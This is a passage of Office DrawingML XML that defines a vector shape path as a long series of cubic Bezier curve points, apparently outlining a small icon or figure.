                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="194"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="209"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="199"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="71" y="200"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="197"/>
                      <a:pt x="4" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="192"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="169"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="8" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="183"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="146"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="98"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="159" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="157"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="158"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="153"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="150"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="75"/>
                      <a:pt x="84" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="66"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="72"/>
                      <a:pt x="90" y="75"/>
                      <a:pt x="86" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="71"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="51" y="109"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="118"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="131"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="141"/>
                      <a:pt x="40" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="36" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="147"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="158"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="198"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="185"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="184"/>
                      <a:pt x="105" y="183"/>
                      <a:pt x="109" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="178"/>
                      <a:pt x="112" y="176"/>
                      <a:pt x="113" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="173"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="116" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="179"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="191"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="196"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="120"/>
                      <a:pt x="135" y="98"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="117"/>
                      <a:pt x="140" y="124"/>
                      <a:pt x="138" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="136"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="129" y="138"/>
                      <a:pt x="128" y="137"/>
                      <a:pt x="127" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="133"/>
                      <a:pt x="127" y="131"/>
                      <a:pt x="127" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="122"/>
                      <a:pt x="126" y="115"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="71"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="63"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="55"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="44"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="37"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="38"/>
                      <a:pt x="100" y="39"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="106" y="51"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="46"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="42"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="36"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="75" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="33"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="66" y="33"/>
                      <a:pt x="65" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="67" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="38"/>
                      <a:pt x="70" y="37"/>
                      <a:pt x="72" y="38"/>
